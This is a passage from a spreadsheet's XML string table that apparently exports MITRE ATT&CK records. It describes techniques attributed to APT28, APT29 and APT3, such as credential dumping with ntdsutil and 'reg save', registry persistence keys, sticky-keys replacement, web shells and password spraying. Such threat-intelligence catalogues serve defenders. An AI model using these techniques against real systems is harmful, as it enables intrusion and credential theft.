  <si>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relationship--10cc3288-d06c-456c-bc0e-b10a8c5abeaa</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used [Tor](https://attack.mitre.org/software/S0183) and a variety of commercial VPN services to route brute force authentication attempts.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--d811c17d-5ed4-4218-b1c9-280e332e30e2</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>relationship--5ea36f9f-f5b6-4494-be0a-061058d6b1f1</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</si>
  <si>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</si>
  <si>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relationship--3094a14f-ccd2-4ba4-a3f6-c6d2721f02db</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has saved files with hidden file attributes.(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>relationship--08fd666f-684f-4e78-876a-48cb92572c3a</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used the WindowStyle parameter to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: Palo Alto Sofacy 06-2018) (Citation: McAfee APT28 DDE1 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--27e91ac8-9463-4a7a-8f1f-89abeba1b02d</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</si>
  <si>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</si>
  <si>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relationship--644b6c21-90f0-43b7-8da4-7f6f24ddabb6</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</si>
  <si>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</si>
  <si>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relationship--dc10e96f-1d3c-4ab9-8df6-acdc8238ec6c</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used tools to perform keylogging.(Citation: Microsoft SIR Vol 19)(Citation: DOJ GRU Indictment Jul 2018)(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>relationship--2d450e2f-25c9-49af-b83f-6c91029ed28a</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</si>
  <si>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</si>
  <si>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relationship--e71903c4-a7af-4317-adf0-10f76d3d4e15</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has stored captured credential information in a file named pi.log.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--ec6a8fde-702a-4e38-a37b-428a8ca10b18</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan adds the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--237d098d-f796-49a0-bdc8-61909cd74feb</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</si>
  <si>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</si>
  <si>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relationship--a1fe7df1-7c20-422e-8e86-042cd11b3501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</si>
  <si>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</si>
  <si>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relationship--ac65e484-b59a-40e1-984e-02dc4b62b6f0</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</si>
  <si>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</si>
  <si>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relationship--d7af8f20-9581-4b41-a591-118842f8ba6e</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has renamed the WinRAR utility to avoid detection.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--a292f2c5-a071-424e-b8b8-03d195c466ad</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--6a1ddd06-a5bd-440b-aa19-285e7370477c</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has routed traffic over [Tor](https://attack.mitre.org/software/S0183) and VPN servers to obfuscate their activities.(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>relationship--2b6195a4-72f8-4d31-9824-a7c8a7018134</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used the ntdsutil.exe utility to export the Active Directory database for credential access.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--01e22d76-e2ee-407a-834f-e3428df142ba</t>
  </si>
  <si>
    <t>In 2016, [APT28](https://attack.mitre.org/groups/G0007) conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency.(Citation: US District Court Indictment GRU Oct 2018)</t>
  </si>
  <si>
    <t>relationship--5e9256c1-5ad5-4fb2-9a75-0267a2daae89</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</si>
  <si>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</si>
  <si>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relationship--cb69217e-f063-4093-bcf0-f051ecd42e25</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</si>
  <si>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</si>
  <si>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relationship--c7e8689c-25cf-4fac-926e-c55a2414f16c</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</si>
  <si>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</si>
  <si>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relationship--1b143de7-af2d-4991-9e2e-aa85a8d7d330</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key &lt;code&gt;HKCU\Software\Microsoft\Office test\Special\Perf&lt;/code&gt; to execute code.(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>relationship--d0560e25-020d-4cd6-b61c-5fc82a757edc</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used pass the hash for lateral movement.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--22ccfcb8-cb4a-4b9e-bc2d-c0bd2701e2e9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</si>
  <si>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</si>
  <si>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relationship--4b8bdc58-cfb9-4841-94e9-421b9e08f44f</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</si>
  <si>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</si>
  <si>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relationship--d6958d59-7b54-407c-8bd9-00891c580acc</t>
  </si>
  <si>
    <t>11 September 2020</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) uses a module to receive a notification every time a USB mass storage device is inserted into a victim.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--56d023cf-4390-40d9-afc6-cb0d40b4cdd1</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used spearphishing to compromise credentials.(Citation: Microsoft Targeting Elections September 2020)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--666e9638-d9d9-4480-a98c-dfa247e43bd2</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) downloads and executes PowerShell scripts and performs PowerShell commands.(Citation: Palo Alto Sofacy 06-2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--16e90509-5ea2-48ff-8e09-686dcfddbb3b</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--51d06864-d5de-4286-b2bb-561a8d2c4d49</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has deployed malware that has copied itself to the startup directory for persistence.(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>relationship--1829d419-0145-4a47-bb1e-ff00e647b5ff</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has staged archives of collected data on a target's Outlook Web Access (OWA) server.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--be571764-53d2-4f73-9567-8001e59925b8</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected emails from victim Microsoft Exchange servers.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--1ba59a68-1883-492d-8cd8-f22656eb58a4</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--edaf0203-4959-4e1e-9240-3d20cf0f3b6a</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a UEFI (Unified Extensible Firmware Interface) rootkit known as [LoJax](https://attack.mitre.org/software/S0397).(Citation: Symantec APT28 Oct 2018)(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>relationship--a5022441-bc5e-4b19-a773-b96b2719d1bb</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</si>
  <si>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</si>
  <si>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relationship--8f269f6c-9e8b-4296-ab47-2f60c9156b58</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has mapped network drives using [Net](https://attack.mitre.org/software/S0039) and administrator credentials.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--fe028d0f-b02e-4856-8593-c71a07b9519b</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used tools to take screenshots from victims.(Citation: ESET Sednit Part 2)(Citation: XAgentOSX 2017)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--48f662fe-1ba2-4c19-b782-dd06d9fb67fa</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected information from Microsoft SharePoint services within target networks.(Citation: RSAC 2015 Abu Dhabi Stefano Maccaglia)</t>
  </si>
  <si>
    <t>relationship--743ed7c3-c0e3-4290-9410-f6bec9224c30</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</si>
  <si>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</si>
  <si>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relationship--15bbd8e5-60ad-4906-8231-f92c231bb1ec</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</si>
  <si>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</si>
  <si>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relationship--c263ca38-f85d-42ab-b56d-8f6121c3aed6</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has conducted credential phishing campaigns with embedded links to attacker-controlled domains.(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>relationship--9aa9b9f6-a22f-4763-a2ff-7635f5022727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</si>
  <si>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</si>
  <si>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relationship--d348102c-89dc-452a-b86d-2460928defaa</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) installed a Delphi backdoor that used a custom algorithm for C2 communications.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>relationship--ea2f41fe-0701-4607-aa70-d6531c7461c6</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro. (Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>relationship--73321011-c231-402e-a6bb-b9fd6cf6b658</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has performed timestomping on victim files.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>relationship--1036833a-1d4c-4d9e-b716-1e52606ab684</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.(Citation: FireEye Op RussianDoll)</t>
  </si>
  <si>
    <t>relationship--b719d37b-8f0e-4704-b21d-8977a5c7cceb</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</si>
  <si>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</si>
  <si>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relationship--242de5f8-7944-4fdd-af87-a5da0050e7c3</t>
  </si>
  <si>
    <t>Once [APT28](https://attack.mitre.org/groups/G0007) gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>relationship--565d2d07-0e2e-44e5-bc37-5a64e49394ee</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</si>
  <si>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</si>
  <si>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relationship--7606ad11-1322-4b97-83b9-aaafaee02c07</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has performed large-scale scans in an attempt to find vulnerable servers.(Citation: TrendMicro Pawn Storm 2019)</t>
  </si>
  <si>
    <t>relationship--54b73912-002f-43ca-b8a2-7439aff45aab</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</si>
  <si>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</si>
  <si>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relationship--87f45aac-1025-4a44-af9c-db139ea60f78</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used newly-created Blogspot pages for credential harvesting operations.(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>relationship--511e186f-2a71-4fb2-9a54-12fd80e2cd50</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--1f6fe0b5-3696-4a76-82c7-b866b1a8269a</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</si>
  <si>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</si>
  <si>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relationship--5799308b-e710-40b8-ad64-2b7916673560</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used sticky-keys to obtain unauthenticated, privileged console access.(Citation: Mandiant No Easy Breach)(Citation: FireEye APT29 Domain Fronting)</t>
  </si>
  <si>
    <t>relationship--e65112dc-8a58-486f-9f3b-5a84925a3e53</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</si>
  <si>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</si>
  <si>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relationship--d9fca287-fe50-43f8-bf6d-da6751ef8009</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used large size files to avoid detection by security solutions with hardcoded size limits.(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>relationship--73af9ac3-d637-4b1f-9995-e45cd8cc067d</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has hijacked legitimate application-specific startup scripts to enable malware to execute on system startup.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--555ccfc5-909a-455d-a39a-446020b22f88</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has bypassed UAC.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--fdcda836-4a21-45d2-8269-31b82aa3c08e</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments. They have also utilized AADInternals PowerShell Modules to access the API (Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--e6e736c1-5522-48fd-8e2c-06fef46199a8</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has conducted enumeration of Azure AD accounts.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>relationship--ceed81ff-99e9-45d2-8118-8f2ada6d13d3</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) can create new users through Azure AD.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>relationship--3920af52-2820-42e8-a6a8-2182c3a3908a</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used residential proxies, including Azure Virtual Machines, to obfuscate their access to victim environments.(Citation: Mandiant APT29 Microsoft 365 2022)</t>
  </si>
  <si>
    <t>relationship--a4c888fc-278d-43a1-98a5-5ae1b2694b82</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has gained access to a global administrator account in Azure AD and has used `Service Principal` credentials in Exchange.(Citation: Mandiant APT29 Microsoft 365 2022)(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--44ba0ff1-3858-4b2e-933d-e5dc00b4ca27</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used Azure Run Command and Azure Admin-on-Behalf-of (AOBO) to execute code on virtual machines.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>relationship--3d0fed27-cf0e-4ca4-aef3-04300422299a</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</si>
  <si>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</si>
  <si>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relationship--93e345d9-a7d2-4abd-be34-46211fa64a7d</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has stolen data from compromised hosts.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--3be08ed9-951a-4686-9f60-114f0468325d</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account.(Citation: Mandiant APT29 Microsoft 365 2022)</t>
  </si>
  <si>
    <t>relationship--3bd11b5b-4dba-4612-98e0-0f3e18686123</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has created self-signed digital certificates to enable mutual TLS authentication for malware.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)</t>
  </si>
  <si>
    <t>relationship--3bd4bd69-b1f6-426a-a63f-b8107eb57f8e</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has disabled Purview Audit on targeted accounts prior to stealing emails from  Microsoft 365 tenants.(Citation: Mandiant APT29 Microsoft 365 2022)</t>
  </si>
  <si>
    <t>relationship--7daf9c52-2baf-450c-8f37-cbdcd70b7b9d</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used the meek domain fronting plugin for [Tor](https://attack.mitre.org/software/S0183) to hide the destination of C2 traffic.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--27e7f34e-9750-4cf0-8260-33f2996ee38c</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used Dynamic DNS providers for their malware C2 infrastructure.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--2c57efb7-0a7a-4b75-bbe1-e6f243713bee</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has compromised email accounts to further enable phishing campaigns and taken control of dormant accounts.(Citation: ANSSI Nobelium Phishing December 2021)(Citation: Mandiant APT29 Microsoft 365 2022)</t>
  </si>
  <si>
    <t>relationship--e794539e-3c07-4954-ba3c-f6c8ea6432e0</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used multiple layers of encryption within malware to protect C2 communication.(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>relationship--a8981fca-0584-4e9e-8f92-83843e1e4462</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</si>
  <si>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</si>
  <si>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relationship--bf0ff6f3-51a5-4718-af3f-8f75b1eb507c</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</si>
  <si>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</si>
  <si>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relationship--5ca1f5dc-9573-46bb-a9db-fb83cd15b272</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has exploited CVE-2021-36934 to escalate privileges on a compromised host.(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>relationship--2d4edddf-2870-49cb-a7ee-026b8c09fe2e</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used compromised identities to access networks via VPNs and Citrix.(Citation: NCSC APT29 July 2020)(Citation: Mandiant APT29 Microsoft 365 2022)</t>
  </si>
  <si>
    <t>relationship--8bc0dbc4-f84b-448a-95f9-f6b0ae56f256</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used [SDelete](https://attack.mitre.org/software/S0195) to remove artifacts from victim networks.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--5bda4ebe-cd21-469e-9495-952df7254f17</t>
  </si>
  <si>
    <t xml:space="preserve">[APT29](https://attack.mitre.org/groups/G0016) has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.(Citation: ESET T3 Threat Report 2021) </t>
  </si>
  <si>
    <t>relationship--5bc4476e-9693-424c-b4d1-fd3a9ca996f3</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</si>
  <si>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</si>
  <si>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relationship--7a58b25f-1736-48c6-90e1-70c49896ed4b</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has downloaded additional tools and malware onto compromised networks.(Citation: Mandiant No Easy Breach)(Citation: PWC WellMess July 2020)(Citation: F-Secure The Dukes)(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--3c89c7b8-facc-4225-94ba-4a5126a31adc</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has ensured web servers in a victim environment are Internet accessible before copying tools or malware to it.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--4c747463-f1e0-40fd-a3ed-dc01bc112651</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used the `reg save` command to extract LSA secrets offline.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--bd9a6be1-903f-4a7b-a143-8c8d1da6cabc</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</si>
  <si>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</si>
  <si>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relationship--f3f122f1-998f-4079-afad-7a59e39f89b7</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used various forms of spearphishing attempting to get a user to click on a malicous link.(Citation: MSTIC NOBELIUM May 2021)(Citation: Secureworks IRON RITUAL USAID Phish May 2021)</t>
  </si>
  <si>
    <t>relationship--616bf309-ed87-4573-8640-416e6f05285d</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used unique malware in many of their operations.(Citation: F-Secure The Dukes)(Citation: Mandiant No Easy Breach)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--4e7404a5-2d19-48cc-b906-ab1aca4f4b08</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>relationship--c7602a92-d2d5-488d-b0b7-986ec1ef594d</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</si>
  <si>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</si>
  <si>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relationship--6828b200-b067-4667-9a77-9e434a625eaf</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has use `mshta` to execute malicious scripts on a compromised host.(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>relationship--b8fdee05-cbe2-43b1-a224-e4b019017c3e</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used repeated MFA requests to gain access to victim accounts.(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)</t>
  </si>
  <si>
    <t>relationship--0cb7daf3-9c55-4210-a2a8-c5e40cf4ffbd</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</si>
  <si>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</si>
  <si>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relationship--54188543-7746-4158-9a9f-5556bb99ec7a</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used Kerberos ticket attacks for lateral movement.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--5de21fc4-c460-4da4-9dc4-2acdd54640a8</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has successfully conducted password guessing attacks against a list of mailboxes.(Citation: Mandiant APT29 Microsoft 365 2022)</t>
  </si>
  <si>
    <t>relationship--ac1597ea-c0da-4365-998e-25e8e1ee87c9</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has conducted brute force password spray attacks.(Citation: MSRC Nobelium June 2021)(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>relationship--6c4b2975-6cad-4a10-8006-1e2e973a8a8b</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</si>
  <si>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</si>
  <si>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relationship--7f78df2e-e6e9-43f1-815b-58e4a10fc594</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has developed malware variants written in Python.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>relationship--b5373794-5133-41b2-9050-228ebac75c92</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has installed a run command on a compromised system to enable malware execution on system startup.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--91e9d060-8d6f-4d3a-9c69-8935f8e72338</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) added Registry Run keys to establish persistence.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--343d285a-e910-487b-8e85-dc87cdb63be3</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</si>
  <si>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</si>
  <si>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relationship--6ee0cf67-d033-4620-b0c6-29b7a7d6592d</t>
  </si>
  <si>
    <t>03 April 2023</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used named and hijacked scheduled tasks to establish persistence.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--4a0887ab-3ec3-436a-b378-6e28847dfb1e</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used the `reg save` command to save registry hives.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--20785dd8-7692-4dcd-81ee-06bc9faa001c</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used UPX to pack files.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--ff4e1b0e-eea2-4329-aecc-e5353be8c1f4</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</si>
  <si>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</si>
  <si>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relationship--410f6714-cd02-4253-b324-a8ac15e70bca</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</si>
  <si>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</si>
  <si>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relationship--a1d7019e-ccb0-42cb-ba7c-351dd5cb152f</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used the legitimate mailing service Constant Contact to send phishing e-mails.(Citation: MSTIC NOBELIUM May 2021)</t>
  </si>
  <si>
    <t>relationship--b0f6cf11-a8ac-4aba-a540-6bfa2b722f9c</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.(Citation: Mandiant APT29 Trello)</t>
  </si>
  <si>
    <t>relationship--ca1a0b5b-f07e-4017-8d9e-da784a75dc37</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--a1da2d38-1c36-46bb-9245-ec4f650ef101</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</si>
  <si>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</si>
  <si>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relationship--2370fba0-1d66-4aad-ac01-fb63857b7732</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has compromised IT, cloud services, and managed services providers to gain broad access to multiple customers for subsequent operations.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>relationship--ae93611e-8520-4c12-8fbe-7437f33a4092</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used a compromised account to access an organization's VPN infrastructure.(Citation: Mandiant APT29 Microsoft 365 2022)</t>
  </si>
  <si>
    <t>relationship--b1bddecd-763f-42f2-bb49-360d2507b7a6</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has conducted widespread scanning of target environments to identify vulnerabilities for exploit.(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>relationship--9bc0b5e1-d9be-4303-b396-df990c664c4b</t>
  </si>
  <si>
    <t>29 July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</si>
  <si>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</si>
  <si>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relationship--53a6a12f-04f2-445b-b733-8392ade1a7e5</t>
  </si>
  <si>
    <t>31 October 2022</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has installed web shells on exploited Microsoft Exchange servers.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--b1de5210-fbd9-4439-8d1a-bc400054d0ad</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used WMI to steal credentials and execute backdoors at a future time.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--ab51525b-93c6-4ea8-bd83-b9547f1317bb</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used WMI event subscriptions for persistence.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--337dc23f-d825-415d-886b-53c3457fbd56</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) replaces the Sticky Keys binary &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt; for persistence.(Citation: aptsim)</t>
  </si>
  <si>
    <t>relationship--a92197a8-ec5c-4366-92af-f45078a3bfd7</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to add created accounts to local admin groups to maintain elevated access.(Citation: aptsim)</t>
  </si>
  <si>
    <t>relationship--62f16083-efca-477c-8107-e208ca4c75cb</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used tools to compress data before exfilling it.(Citation: aptsim)</t>
  </si>
  <si>
    <t>relationship--b028b9a6-4031-4b56-8dd5-0bdd3c59dbec</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--80dcd852-39c2-4ef9-a401-e54982010a65</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used tools to dump passwords from browsers.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--3911c758-2c61-4615-88a1-4b9f21c99a9c</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to side load DLLs with a valid version of Chrome with one of their tools.(Citation: FireEye Clandestine Fox)(Citation: FireEye Clandestine Fox Part 2)</t>
  </si>
  <si>
    <t>relationship--99c0cda4-91b1-4845-9891-9a4b89c128f9</t>
  </si>
  <si>
